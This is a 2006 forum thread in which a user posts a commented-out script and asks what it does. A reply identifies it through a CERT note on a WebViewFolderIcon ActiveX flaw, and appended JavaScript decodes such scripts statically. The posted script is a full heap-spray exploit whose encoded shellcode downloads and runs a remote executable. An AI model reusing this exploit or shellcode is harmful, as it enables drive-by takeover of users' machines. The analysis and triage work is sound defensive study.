What is this script doing?

Discussion in 'Javascript' started by V S Rawat, Oct 17, 2006.

  1. V S Rawat

    V S Rawat Guest

    Could someone please give me some idea what this script is doing.

    It might be some malicious script that might have been used to spread
    a virus or to hack username/password, hence it has been ### so that it
    can't be run by default.

    thanks.

    <!-- <html>
    ###<body>
    ###<script>
    ### var heapSprayToAddress = 0x05050505;
    ### var shellcode = unescape("%u9090"+"%u9090"+
    ###"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
    ###"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
    ###"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
    ###"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
    ###"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
    ###"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
    ###"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
    ###"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
    ###"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
    ###"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
    ###"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
    ###"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
    ###"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
    ###"%u6d2f%u686f%u6973%u776e%u6265%u6973%u6574%u632e" +
    ###"%u2e6f%u6b75%u622f%u6e69%u3264%u652e%u6578%u0000");
    ###var heapBlockSize = 0x400000;
    ###var payLoadSize = shellcode.length * 2;
    ###var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
    ###var spraySlide = unescape("%u0505%u0505");
    ###spraySlide = getSpraySlide(spraySlide,spraySlideSize);
    ###heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
    ###memory = new Array();
    ###
    ###for (i=0;i<heapBlocks;i++)
    ###{
    ### memory = spraySlide + shellcode;
    ###}
    ###for ( i = 0 ; i < 128 ; i++)
    ###{
    ### try
    ### {
    ### var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
    ### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
    ### }
    ### catch(e){}
    ###}
    ###
    ###function getSpraySlide(spraySlide, spraySlideSize)
    ###{
    ### while (spraySlide.length*2<spraySlideSize)
    ### {
    ### spraySlide += spraySlide;
    ### }
    ### spraySlide = spraySlide.substring(0,spraySlideSize/2);
    ### return spraySlide;
    ###}
    ###
    ###</script>
    ###</body>
    ###</html>
    ### -->
    --
     
    V S Rawat, Oct 17, 2006
    #1

  2. V S Rawat

    denisb Guest

    "The Microsoft Windows WebViewFolderIcon ActiveX control contains an
    integer overflow vulnerability. This may allow a remote, unauthenticated
    attacker to execute arbitrary code on a vulnerable system."

    in <http://www.kb.cert.org/vuls/id/753044>
     
    denisb, Oct 17, 2006
    #2
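One way to answer a "what is this script doing?" question without running anything, as an added example that is not part of the thread: read the script as text, decode its `%uXXXX` data into bytes, and list the embedded strings and the ActiveX controls it instantiates. The function names are assumptions of this example, and the sample input is constructed (a `.invalid` URL), not the payload posted above.

```javascript
// Static triage only: the script under analysis is read as text, never run.

// Decode unescape()-style "%uXXXX" escapes to bytes. Each escape is one UTF-16
// code unit, stored low byte first in memory (little-endian).
function decodePercentU(text) {
  const bytes = [];
  for (const m of text.matchAll(/%u([0-9a-fA-F]{4})/g)) {
    const unit = parseInt(m[1], 16);
    bytes.push(unit & 0xff, unit >> 8);
  }
  return bytes;
}

// Extract printable-ASCII runs, like the `strings` utility.
function asciiStrings(bytes, minLen = 5) {
  const found = [];
  let run = "";
  for (const b of bytes.concat(0)) { // trailing 0 flushes the last run
    if (b >= 0x20 && b <= 0x7e) { run += String.fromCharCode(b); continue; }
    if (run.length >= minLen) found.push(run);
    run = "";
  }
  return found;
}

// Report the ActiveX ProgIDs a script instantiates, the strings hidden in its
// %u-encoded data, and whether that data opens with a run of 0x90 bytes.
function triage(source) {
  const clean = source.replace(/^\s*###/gm, ""); // drop "###" defang marks
  const bytes = decodePercentU(clean);
  const ctor = /new\s+ActiveXObject\(\s*['"]([^'"]+)['"]/g;
  return {
    progIds: [...clean.matchAll(ctor)].map((m) => m[1]),
    strings: asciiStrings(bytes),
    nopPrefix: bytes.length >= 4 && bytes.slice(0, 4).every((b) => b === 0x90),
  };
}

// Constructed sample: four 0x90 bytes, then the ASCII bytes of a placeholder
// URL, written in the same "###"-prefixed form as the post.
const SAMPLE = [
  '### var code = unescape("%u9090%u9090" +',
  '###"%u7468%u7074%u2f3a%u652f%u6178%u706d%u656c" +',
  '###"%u692e%u766e%u6c61%u6469%u612f%u622e%u6e69%u0000");',
  '### var obj = new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");',
].join("\n");

console.log(triage(SAMPLE));
```

A URL or DLL name recovered this way, together with the ProgID, is usually enough to match a sample against an advisory such as the CERT note quoted above.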